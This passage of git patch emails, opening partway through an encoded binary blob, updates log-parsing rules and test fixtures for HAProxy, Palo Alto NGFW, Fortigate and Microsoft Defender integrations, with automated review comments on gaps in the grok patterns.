zo?K5zwi*rbl^D;g0iVtU?czOyGqXGgWlo=p8}LIgRtbG!Ki_E{-%8(diIm8hTM~qv z$oHRgOg^c|vM(--HUwrk^sRbkW@3vZ4_eq8KG=yh0?m>2qb+Z>la)um5%UKh1DNle za}WLd_o?Rx_Z8NSseS&#l>GWwbCbA2CiME>kruKBjNthx!e?x^4anH!^jhc3A0+^r zFEI>SnAY^+eq$mATY#4$Z#kt!MZz|!*y(0aPOcvQQdsyz7u;Dpg#{w1yq(XN4V^I@ 
z-#Z2wg88!EZY2#>%H~S>uCzn<{``usED#u-p>~o|ErboE3d}$>{ZF++x}( zzvuVfH!lUJjlrmCxhc86?wBV)$>ooAZC;$#tDg3{Y{xm%WV-nUc{(+t^7=eA@rUhC zVLKX&;(io+@PD1_f!=pJw-5jJY7|IHY-N<92;X=VC_z0q_a=c~OMl_%fzOPpkcb+X z2j4J2-yJd`O+amd_gW&aYYsA>eoe`WCZqGVHZ(L0-)$LOuZQ00Sx$QtHKX-RS7N<1 zR5tBxS7B}bWW6gO_Y;JpguZ_rXY5pP)H3FmG(c*;l`Ngy#ud)RsL2{SQ$;;VVwQz? z7mn*!tjNyQ6-bc$Lyfp`cS}qD`4mw^+aNeUD#+rKw_&#w|8=9;kDwA_#vT@Tjpb>) zRLmE1nfsk4MS;B18gb)sef%EL57FfvvI9S1BklDlWE?n<;4=RvA8z}FG_{P*?LY*~ z=R7bzKCXvwP5f}uI6=is)rjy>m#o~GQN5u6&u0kZ<{iJ{^Rl9+7-Ig$gF&@4tbAvW8%*B!O6J*?B=du;hcM&I3K_Ff|w;swd_8}=b?1&JqhkjaY_aS z^b5LqqpZl%_ep#s+KzsH=k4S($7FJSO!Srxoe(Tl>dLq?DMBK#M%#FM>l84ae2xW6 zp_m)~l(5D3Ce^=mxYQm*1XV(krt0m+_#@%3t$#VI9cCfDz`n76gP8ppik*H+K zZT{&e1F;ZF_OQj%royE^r%gQn(F^jhxzku}uleB^)h81=o&&abH#avU3k#nBhUrTO ztyS2pvm#JhTbCz4VMDnze%uxJU?$njgD!n?m*T!!wo5Kext(#s>Q?|$LOc)9-~2$J zl5x0h_K73HbY^??{QYxo_^lX@w(n#A3o*$=Q{nc|sU>|rEnYev#!e3=lJY!1$jI!d zp!ESG4yBEh&LqC_uN0To_Uup37b#XFmgr8{JH;_VFSlct|NKHsuPAEc-jpYEv5n=Z zm!{Zt944C6-y?_n zLJfAMj6jeh2xocL#OAui?^hwkSLcM&Pvzp?^hTlMVpNS`7hCzse!qkr$cuGf`y~+XjoRjjqn#-C)99m z8M3AqQI)TC(M*bcSxhz+jw0W>M*`hO0s(=gJsw{lxUpm6r^ZHL+V2)oi1Ek==*ZtCmP7Vx%voClFzk>~;A@zp-8k&1Vm7bVp zwtAyNyID-Z7P&RtoR6*0p@kx)?1un@1=cHPl2>q==-zK`i(~U;tGYj*EN7-((^y_| zsbd_@yOIPm^LEkq3trq4l#(*>?k82Ysj9k8J`F+MfSI+y5HOy8>2}sOBWMA%W`7L0 z+Y|&pKNALOBKjSQ6%zqvYFX4%=D|19@{YAJzpHH+x_V$>U?v_M2O2N!M`f%{ijTGz zL3Ot^kX?aIklgxA3Z2zZB%K;DsKPP8F|)oOMidL_y!A2~snMOan0^Elb#tAH=-UMc z0&xG~p~uwW@aso(9K4r60sCA)k(DPbs?6%vR*ZIu?xoijY|B5wn7ntsZ$zNl_r0=V?h4HC~F`m!%3q8|bd3n=qBX`B$Jhn8o$WOF*-NU9&WkpEwzQPvY_8N*( zG2y+S!&SrJ^#(8NVFXn=0Gc6rclk#&S(D3by(4aL5Qldn^?Hmp^&P9Z8t2{m_a^s` z{5y_D6%V8V<{V8(m%+lX=snpyaJ}HIGD)lRs zYCmnc`j`?*7N0>w&39cjqfYA+Jj=f;-kjbwt4F)C^$^rGwQUW}iF4t`nS!$qfbk#- zOU}`jD2Xsl38qd{JzBPn4(9mZqS4hE+|-KPM5K(a6Gg*gty`68OvmQ6KkUdMJif6E z#EaQ?YPp#K=IQWTBnj&N@-8TaNlT{NbFJtFDgS-F#5)rs`u_Cn?y7k1HR>;X?lWn7 zT2Zo(dt4UWUxX-?dTp4`x@z2eHnopejC8XNqn#7)*f~d=ZXbO}4|_1}lBhaB2D$2z 
zl}!7YT%pw2g6}=1$wLVXg~@~(KXIgHnII~;slp0;{UMsh~K&-`Vej(cb#qwE+PP#&bs zb1}b#>3~R<#OJp(Y2%0$@=^X4yv`rHLg^v{UT|}8`WCOf<&5V)4_>>~a~dPBb5d08 zY9VmO^y776a)PQy!RXt<%>XWv zdgbi>;Rg=^`$AGEOWl)BjUmR4R{BQ}qr2R1E&{19x^lnL0zE*dL9bQ9iSCtuAHc|T z20?Y#ZHeE1b-5z|?(9_N+a|BfY^2?i6WPKohFDVE-d{40v1SCl=>YAc?KZv#pzSgT0+TKY(#tiSCHSsFfDQhGSeCZ(!cVUPD zmxGLr%*N>7snNu;p8Y`31bv_hdsmSdjJ!z#c01iDdi$3N6)lu5?^l$4F_RqnYb0uA z)8eDncvVFpwFA>DIR4BjjH{D1VS57Q#`)OT5+UcrNo+`7Vm~pX#i1+vlI?;V;o4z{ zNX34A+U*oAcYzuH$6R2kAd-1%(NH(B*RzlX7%1Wse~HhKJ`y35dP2UG&!*}>X3`V< zn^{7_LZrrmylfZc?v%6>*#-UNb`vV4=2PGZnt25KtxV8}Q?rn9Vj^(vUC9pmWjoZA z&~9K>?i5CiLwUKj98+wL(>$w#`v{8jlJIE>#dV4qg5f|!- z?!bG!&&gB$YWAc9eDs8uEzI0=$|TVJ$^fy)4na4d6$%7CDm~X*w=Y%exbxyy9-WRb zgT>2leLtbD4o@`rCaTq7P0syyx6ht7Jv*4vS&f?}MIN6h&98aA>RVu-!^hUTHCCdD zx=DCyyd!2#i}?0M1O@9%6^6~Nr^ZezUP*sm`h4TN?pvwnG?Wp%Lr!d{k(rY-pGM}@ zk6%L0`*4LCiFPhuU#xL0;!Acl(+UT7p)^DP$NuP?LREvG6>k ze}?s8{KPH?^$>J#xWs%BE{f1zfMD+qc+yRZ(8!)$T#{#4LDFbuh73%Z$yY8oXs&_KH@IPhIh zdw`j#4rlAV+$Xg(e_GdWf-aVXvfe(X{QB2wi2ENLaHcdUF0V&-hdI!KE5jU z69wuV9TahcS1W1n4P0mI*ZD{QXmz2tj4yFBfTd}=2h!dmk{VOve11dsj7T;+e{qp< zWG$A6ct)aIRsoebxaj9HpWb4P?o#KRpXO#me{j)XX;4x_z#H{< zY<&2t=erEe>v@7I-`(lOnYc=`%XxFy8Oz!AuCQLw2<$oBPaF*PTiq=6q=@y*CwJ`Osqa6D`9Bb`1XbFAxvl z{@njYK;y;q(h3|Q5$*#1H9ygH`$4m*oDS(MCpt%Hm3EzM0=ZRI~$3JWWe#{G{8D>t^9mm7Udcl=A zlbX3nKEO?lP7+>yJq&+2^Gc9$P#CYHaB=^|i!nz(<2Pr)JdBx8NkI`>i}+>FrA%lN zYQR0yyPjz&3R+1Xd7`8gn=-P&oosr=2zpIky{8~aocA^|x~pQ}@A4*tv$I6h=o+df zlp3ro@j29*bMDjIr;qQZ&ftFxTuEp?cQK+2YYx+xIN_&$>-qc++h$-sv>Jmo-vhTp zXcPP0D)s{Omu;n;G|}3>!e|HQ!>z`yOSg(ayQ?g>{}NY^#JyUtH$TF9AlRkHV(`@~ zi6Ln~ppPxOgov_nYH~cdaI|OaKrEGz@;mqiwX>oTej$P8R~%CtWY_VL0!0Mz73H~J z!+9T4)s&T#v$JU{Vbd453uHTU$dAU;e8Z_b*&%9&EE?|I{=EQrXO!m<6FKd~A3ZH9 z{b7pgjYsG@nD{vQKeMURK@%=D*8U*eATW4W1?Mqn&y4_6$dcibbbA7+-C&7iYuC!P7 zx8dgAZ*1WH*1&KUh;N;Ojp@WmXvlVHM$`VwV<~qLG1Q?jXmB0hreXHkn0=b^*|{Hc z80FjNBNsvpo$e$#_1ub>)nW7xe)97t14*68H0!qSm!rVNm}dN1$o^z@oI~l@wUM&I zDJ(1;=3vhVNn2{zoVjcINpFt<& 
zFEOF7fYTul#(_YV2GrE-+vc>D0?MLdz|w1ZwsNh&A^5!Ko?Z|3gC1|cb~41o40HaU zOi5#?(_BIqk$YapBikmKrCyfZsRi)9uHKezNLUU8$RFnoT~DeeOTVqE3vHOcyY_JZ zUbv$pNPlFsHB5`6pEnqLWyIQ-n~ z(~hJP_QuG~04-It)@|Feg1uvbr|C-)m?fOt=1(30!Dgv!!Y{^dBNwC{>%vlb< z=z^niGIP*ZSUN(UHAT7P!O~3NR2c-Y{x8{%*SWnuA$-T=pzeOR6ve7OIDiliS?HUlH}tC-BqPk?zCQ(&vJ9{Bf9 zMORmsQw!iRq+W^o4gUs~ru3L3B2t6JACZ1V+FN@@jT}_u5@=0P^*8XJ&kmB-p{7n& z3mkH9{eD>oLY#5%+}E)#qu?i;xp>a+Pk5s3+1sB*i6ZGeV_jd zIS6*<6a2JOWHS!5_tWM^8EM5}xJIRGR=;gEv+uDI&v{=2q_HcO zl#T(odO$OXnl^hGGO(`^hCLC!Ve~608}+h2AOPCF9XCl?S&Eqcr0lO94SfHuIlAs8OH$jq zQdV%)W!@UP1{0;kqXRjF55y<3@CA{uZN@D#ebr9s)HYWug3bw{9lX80!w&6*=#haa z$ucM~TlHBv9FHH>Yd-?;deuQ(-tWaaT734!w`A^;QRdHmQ^M@++a zM5Y|kRyDLAj1B{K2>XP=;*5X_OR9jUtjUCQS_J$57Qo0c4K4f7i5OE~1wi!av9UVl zU0rTJ@jhWN6?>HC`q1y=i3UKgILuuLxK*<$1?{~p$@fb$^VB%^AAR|~TRhR15_~oZ z)P@=}kA%A?woiKjzjaL2J5F(}hVyf!JY8TYa7?Rm{s)hnxqmRyQ8WYJZeee55}rRp zMJeT@KrcFjt_C9J=znMX&ajinA%EbChekK+Imv395quCXWOD9OdmDUL^wW^dO~tr- zQxIw{!Zw%K)b@U9(U}<$`hukxW{!DFkTC@56v-QE^i}fa+#BAz%Kvl7&nW69Zq?gg z?{?{X^HULMrX)l~r;i?*1IXQySr1mxA#zs_At@yE-jG+n!xW58AF^REL9*s)qLslv zycCESJXvq0v(#^%zZCq{6h3g$VIP#AQAuTjTe!fbE63_bM%<|dbzk6;;|Ix#&>54G zllP-LqC5X%X?_2rU^3bZ0C()Mqy#WN33O$p68WP1VqqIv*0TL|i0E6QM6I!YD25Wa z1oGt=NVD>0f?KZe@0Ff6kjrI1^zCP;+D=rlax!lK2F`6V(;4jI!kh8-=@P(Gm(2z2 zttlK|mt%^J4)n*euDAe2_*Ci zTWyg&m%{jsotU+UV9#}p7cYRLG6Z0eP@JEKh^Q_b^|*|SU_kf?Jw5j&(#9f&l)c?= z|LV`$+8W;*%HS!6hU)nN7UqZF{<15FHU?qxWAO)HcE}UN9(R;%hN!S=ImuHSmyPG} z9d@7QpWc`;p;-238#V=o;^R;H#AnXi_~0tGHQwuD9ha8@EzhLs5pT;UleIV=xKj!C zQ&tzG}7-uci+D`bDOo?rG^jf*;39$KsW0 z{%n;T*y2aDgSlyNI>1sRfQVDL0ofd@=X60W-BMbF;FC#!Bvg&_m%91by4N!a(7RBd zeu~UX6C;#=Ujn`oph6w$hZjWdqp1A zl`j>IOS+pULa#gxRSv8|9Xs>6?>U=gs6Ulud;d({D>^?-7syFRm;k7A%8zw7D3g8p zs<=$}d=;`G+Vx{xF1`gkF1G^4`6{K&JONCry;$jF-pKQL`|WI;T)S$`4%~JgLH<{Q ze`QyxP`@zA^r-p091?p3n3pVlgXaNiNz5+#nt|{%`mkKLCeZ&2MJX8h0c|)w9m3ahh3oy({*Qgz($4swK~wmJsxdF zjngNUb}g4(>|9nY<>3@c+tAEp`#3M0Hxz8vAWjaGHTLX%)CiyTBk0zq#!Hu*KbLBZ z&Mq4j+f`DIpv}#(v$N}x+%Io_G&pZEz;|v%WU0M3;#6!r6{7`2ZImsdspYS>&a&0) 
zC+Oe$J*kAvfN0m5RK;?0B6r(3fp~|s2wkGIE*Q_o|QK+%EEWFQ*W^Uf4qjl&F=pgV=7nGKKv z;X495H7mb9p(=J{%O)KyJ&+C-1XXbuENWr9{C3WcUK6|(`)gy?{ca~m?cYU!-fQ^Z z?$Pg{JsYSBS=51q(0+#|*QvEb?+Y6)@U<-C+CiOgUZ?_Kc2yopKjM~rrO5dgR?4a% z*8JC>Jf1)6v5A`QGwKQKgqVi?HP$Jdgv&!Z9h?2UX}Y~N+OJpiUoCecYJR|Ir=;C$T?WFSWTsaWNfZx2;rOU`j53yUT4*k5 zVeb&hb1pWGkQA6xL(Oi&e@RaCdU?Ui_7|vkh3@)WKI@|Y8%2sEwX?T3mWhGExVvl! zq$~^quQVlrzSdc7b(iu_!J9MeU0i~kyPhIiUFk4HcDLmKN=H|3Zfcl`GAl%rg=hb$ z;hW({-~Q2*4Z*MvB)bxyz5;b^#qALt_wIaDy{y=I48{?MXAr)5k*`^V zTeO@S+iqJ^QAJsjQoSNw-kqKsvlGf<9KSgxnP ziZ&Giyvs%?D@ourkOn~~UF&d=@bKspgvT*}7fCHLFakBCHve&ef*bdo_wy9iY^Y`- z`-Zdw?Xwp+dcFCw+OZi%>ro<)uS)HT;8?sqpoYpvhTY!yM2d!LD;)5%#e#iRW;6;- zb3hA!u{Yk2q}FIpq%bD$OxU^~)84@Ym!Hx+rOcraN&*5SvgEEe#>|Y2?XkOUz@pW~ zyQZx@#hI)9y~LIw&%J?-+!lyi3Gcfwf`B4L3$`=F=2fw@`-}}`?#NfM{)mxLvfp>H z0VGA$&8}#ZCrI2Bo&N@mi-s+Ig^7*+{2APA{jqdCu2iQ|kV=Jy&OS-Tf-rn!-75ceuVY)J@af{xO~L z^=e(%2ZDNG68?wFm~UeE@4x`5u0c*g0VrCIY!8%&f)v5bRI}7Ee+xbcqJTKm*+JIJ zo|6t?@RRQ8BR#IJ Date: Tue, 3 Dec 2024 17:57:02 +0100 Subject: [PATCH 123/150] chore(Microsoft): rename the Microsoft Defender XDR format --- Microsoft/microsoft-365-defender/_meta/manifest.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Microsoft/microsoft-365-defender/_meta/manifest.yml b/Microsoft/microsoft-365-defender/_meta/manifest.yml index 1c858333a..d2e9192ce 100644 --- a/Microsoft/microsoft-365-defender/_meta/manifest.yml +++ b/Microsoft/microsoft-365-defender/_meta/manifest.yml 
@@ -1,11 +1,11 @@ uuid: 05e6f36d-cee0-4f06-b575-9e43af779f9f -name: Microsoft 365 Defender +name: Microsoft Defender XDR / Microsoft 365 Defender slug: microsoft-365-defender automation_connector_uuid: 57f8f587-18ee-434b-a4ed-b5459f5b0fef automation_module_uuid: 525eecc0-9eee-484d-92bd-039117cf4dac description: >- - Microsoft 365 Defender is a entreprise defense suite that coordinates detection, prevention, investigation, and response across endpoints, identities, email, and cloud applications. + Microsoft Defender XDR is a entreprise defense suite that coordinates detection, prevention, investigation, and response across endpoints, identities, email, and cloud applications. Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats. From c03be93f20e239d55f6dc312cc7579e47d1c92a4 Mon Sep 17 00:00:00 2001 From: rombernier Date: Wed, 4 Dec 2024 16:49:13 +0100 Subject: [PATCH 124/150] update HA procy --- HAProxy/haproxy/CHANGELOG.md | 4 +++ HAProxy/haproxy/ingest/parser.yml | 2 +- HAProxy/haproxy/tests/access4.json | 45 ++++++++++++++++++++++++++++++ 3 files changed, 50 insertions(+), 1 deletion(-) create mode 100644 HAProxy/haproxy/tests/access4.json diff --git a/HAProxy/haproxy/CHANGELOG.md b/HAProxy/haproxy/CHANGELOG.md index 60e2c8a26..9896476a3 100644 --- a/HAProxy/haproxy/CHANGELOG.md +++ b/HAProxy/haproxy/CHANGELOG.md @@ -7,6 +7,10 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 ## [Unreleased] +## 2024-12.04 - 1.0.1 + +- Add support for aktci at the end of the log + ## 2024-03.04 - 1.0.0 ### Added diff --git a/HAProxy/haproxy/ingest/parser.yml b/HAProxy/haproxy/ingest/parser.yml index 98783cd3d..e1f5a3c88 100644 --- a/HAProxy/haproxy/ingest/parser.yml +++ b/HAProxy/haproxy/ingest/parser.yml 
@@ -14,7 +14,7 @@ pipeline: ([0-9])%{HOUR}:%{MINUTE}(?::%{SECOND})([0-9]) HAPROXYURL: "(%{URIPROTO:url_scheme}://)?(?:%{USER:url_username}(?::[^@]*)?@)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})" TLS_PROTOCOL: "TLS" - HAPROXYHTTPBASE: '%{IP:source_ip}:%{INT:source_port} \[%{HAPROXYDATE}\] %{NOTSPACE} %{NOTSPACE}/%{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT:http_response_status_code} %{NOTSPACE:http_response_bytes} %{DATA:http_request_cookie} %{DATA:http_response_cookie} %{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT}/%{INT} (\{%{DATA:captured_request_headers}\})?( )?(\{%{DATA:captured_response_headers}\})?( )?"(|(%{WORD:http_request_method} (?:%{HAPROXYURL:url_original})?( HTTP/%{NUMBER:http_version})?))?"( %{TLS_PROTOCOL:tls_protocol}v%{NUMBER:tls_version})?' + HAPROXYHTTPBASE: '%{IP:source_ip}:%{INT:source_port} \[%{HAPROXYDATE}\] %{NOTSPACE} %{NOTSPACE}/%{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT:http_response_status_code} %{NOTSPACE:http_response_bytes} %{DATA:http_request_cookie} %{DATA:http_response_cookie} %{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT}/%{INT} (\{%{DATA:captured_request_headers}\})?( )?(\{%{DATA:captured_response_headers}\})?( )?"(|(%{WORD:http_request_method} (?:%{HAPROXYURL:url_original})?( HTTP/%{NUMBER:http_version})?))?"( %{TLS_PROTOCOL:tls_protocol}v%{NUMBER:tls_version})?( aktci:\"%{IP:aktci}\")?' - name: json filter: "{{grok.message.json_msg | length > 0}}" diff --git a/HAProxy/haproxy/tests/access4.json b/HAProxy/haproxy/tests/access4.json new file mode 100644 index 000000000..89630f6bc --- /dev/null +++ b/HAProxy/haproxy/tests/access4.json 
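Review bot: The new `( aktci:\"%{IP:aktci}\")?` group captures the address into `aktci` but nothing in the commit surfaces it: the access4.json fixture expects `related.ip` to contain only the TCP peer `90.83.225.109`, so `46.193.65.202` is parsed and then discarded, and the client actually behind the proxy is invisible to detection. If this is the true-client-IP value appended by the HAProxy log-format (I cannot tell from the hunk what emits it), map it, e.g. `client.ip: "{{grok.message.aktci}}"`, and add it to `related.ip`, with a comment noting that a client address copied from a request header is only trustworthy when the upstream proxy is the one setting it. The mapping stage that would receive the field is outside this hunk.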
@@ -0,0 +1,45 @@ +{ + "input": { + "message": "90.83.225.109:54761 [10/Apr/2024:15:41:58.284] frontend_https~ backend_lb/LB100 1796/0/0/28/1824 200 1060 - - --VN 296/296/33/6/0 0/0 {saas.ms.example.com} \"GET /path/get/resource HTTP/1.1\" TLSv1.2 aktci:\"46.193.65.202\"\n", + "sekoiaio": { + "intake": { + "dialect": "HAProxy", + "dialect_uuid": "ff1873e7-8757-4b1a-b0ca-b33f9b27f3d9" + } + } + }, + "expected": { + "message": "90.83.225.109:54761 [10/Apr/2024:15:41:58.284] frontend_https~ backend_lb/LB100 1796/0/0/28/1824 200 1060 - - --VN 296/296/33/6/0 0/0 {saas.ms.example.com} \"GET /path/get/resource HTTP/1.1\" TLSv1.2 aktci:\"46.193.65.202\"\n", + "event": { + "kind": "access" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "bytes": 1060, + "status_code": 200 + }, + "version": "1.1" + }, + "related": { + "ip": [ + "90.83.225.109" + ] + }, + "source": { + "address": "90.83.225.109", + "ip": "90.83.225.109", + "port": 54761 + }, + "tls": { + "version": "1.2", + "version_protocol": "TLS" + }, + "url": { + "original": "/path/get/resource", + "path": "/path/get/resource" + } + } +} \ No newline at end of file From d6c0b58dcc4ebd765b594f8bc1121b35800a695b Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 6 Dec 2024 10:44:29 +0100 Subject: [PATCH 125/150] Fix quotes problem in reason message --- .../paloalto-ngfw/ingest/parser.yml | 2 +- .../tests/test_system_event_13.json | 74 +++++++++++++++++++ 2 files changed, 75 insertions(+), 1 deletion(-) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index 944713355..c6cf58abe 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml 
@@ -626,7 +626,7 @@ pipeline: AUTHENTICATION_WEB: "User %{USERNAME:user} logged in via %{DATA} from %{IP:src} using %{DATA:proto}" REASON1: 'User-ID server monitor %{HOSTNAME:hostname}\(%{WORD:vsys}\) %{GREEDYDATA:message}' REASON2: "ldap cfg %{WORD:config_name} connected to server %{IP:destination_ip}:%{INT:port}, initiated by: %{IP:source_ip}" - REASON3: "When authenticating user %{WORD:user} from %{IP:source_ip}, a less secure authentication method %{WORD:auth_method} is used. Please migrate to %{WORD:recommended_methods1} or %{DATA:recommended_methods2}. Authentication Profile %{WORD:auth_profile}, vsys %{WORD:vsys}, Server Profile %{WORD:server_profile}, Server Address %{IP:destination_ip}" + REASON3: "When authenticating user '?%{WORD:user}'? from '?%{IP:source_ip}'?, a less secure authentication method %{WORD:auth_method} is used. Please migrate to %{WORD:recommended_methods1} or %{DATA:recommended_methods2}. Authentication Profile '?%{WORD:auth_profile}'?, vsys '?%{WORD:vsys}'?, Server Profile '?%{WORD:server_profile}'?, Server Address '?%{IP:destination_ip}'?" REASON4: "failed authentication for user %{WORD:user}. Reason: %{GREEDYDATA:reason} auth profile %{WORD:auth_profile}, vsys %{WORD:vsys}, server profile %{WORD:server_profile}, server address %{IP:destination_ip}, auth protocol %{WORD:auth_protocol}, From: %{IP:source_ip}" REASON5: 'authenticated for user %{WORD:user}\. auth profile %{WORD:auth_profile}, vsys %{WORD:vsys}, server profile %{DATA:server_profile}, server address %{IP:destination_ip}, auth protocol %{WORD:auth_protocol}, admin role %{WORD:admin_role}, From: %{IP:source_ip}\.' filter: '{{parsed_event.message.get("EventDescription") != None}}' diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json new file mode 100644 index 000000000..780d2a093 --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json 
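Review bot: Making the quotes optional with `'?` fixes the fixture, but `%{WORD:user}` still stops at the first non-word character, so a quoted user such as `'john.doe'` or `'corp\jdoe'` matches `john` / `corp`, the following literal ` from ` then fails, and the whole REASON3 pattern silently drops source_ip, auth_profile and the other fields. Since the quotes and the literal ` from ` already bound the token, use `'?%{DATA:user}'? from '?%{IP:source_ip}'?` and likewise `'?%{DATA:auth_profile}'?, vsys '?%{DATA:vsys}'?, Server Profile '?%{DATA:server_profile}'?` for profile names that may contain `-` or `.`. A fixture with a dotted or domain-qualified user would pin this.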
@@ -0,0 +1,74 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + }, + "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00" + }, + "expected": { + "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00", + "event": { + "category": [ + "authentication" + ], + "dataset": "system", + "reason": "When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. 
Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-26T21:10:01.627000Z", + "action": { + "name": "auth-success", + "type": "auth" + }, + "destination": { + "address": "1.7.4.2", + "ip": "1.7.4.2" + }, + "log": { + "hostname": "FWPAN00", + "level": "informational", + "logger": "system" + }, + "observer": { + "name": "FWPAN00", + "product": "PAN-OS", + "serial_number": "02410100000000" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "auth-success", + "Threat_ContentType": "auth", + "authetification": { + "profile": "FWPA" + }, + "server": { + "profile": "RADIUS_RSA" + }, + "vsys": "shared" + }, + "related": { + "ip": [ + "1.2.5.5", + "1.7.4.2" + ], + "user": [ + "test000555" + ] + }, + "source": { + "address": "1.2.5.5", + "ip": "1.2.5.5" + }, + "user": { + "name": "test000555" + } + } +} \ No newline at end of file From 4c7891951ac1ac6dcfc605331cda92476af2c577 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 6 Dec 2024 10:48:35 +0100 Subject: [PATCH 126/150] Apply linter --- .../paloalto-ngfw/tests/test_system_event_13.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json index 780d2a093..b4429340a 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00", "sekoiaio": { "intake": { "dialect": "Palo Alto NGFW", "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" } - }, - "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00" + } }, "expected": { "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00", From 930934b0e3b3ea8eb27f023e9bf8a5aba899d80b Mon Sep 17 00:00:00 2001 From: Bichoumac Date: Mon, 9 Dec 2024 20:05:57 +0100 Subject: [PATCH 127/150] Adding a possible value to destination.domain on Fortigate logs Adding the value of remotename to the field destination.domain --- Fortinet/fortigate/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/Fortinet/fortigate/ingest/parser.yml b/Fortinet/fortigate/ingest/parser.yml index 311e0deb0..4cda504c7 100644 --- a/Fortinet/fortigate/ingest/parser.yml +++ b/Fortinet/fortigate/ingest/parser.yml @@ -191,7 +191,7 @@ stages: event.action: "{{parsed_event.message.name or parsed_event.message.FTNTFGTaction or parsed_event.message.FortinetFortiGateaction or parsed_event.message.act or parsed_event.message.action or parsed_event.message.reason}}" destination.address: "{{parsed_event.message.dstip or parsed_event.message.dst}}" destination.bytes: "{{parsed_event.message.rcvdbyte or parsed_event.message.in}}" - destination.domain: "{{parsed_event.message.hostname or parsed_event.message.dhost}}" + destination.domain: "{{parsed_event.message.remotename or parsed_event.message.hostname or parsed_event.message.dhost}}" destination.mac: "{{parsed_event.message.dstmac}}" destination.nat.port: "{{parsed_event.message.destinationTranslatedPort}}" destination.packets: "{{parsed_event.message.rcvdpkt or parsed_event.message.FTNTFGTrcvpkt or parsed_event.message.FortinetFortiGatercvdpkt or parsed_event.message.get('Packets Received')}}" From e7c29187f511ca9f20cce388986d707577befc53 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Tue, 10 Dec 2024 11:17:39 +0100 Subject: [PATCH 128/150] fix(HAproxy): change the way to handle additional information --- HAProxy/haproxy/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git 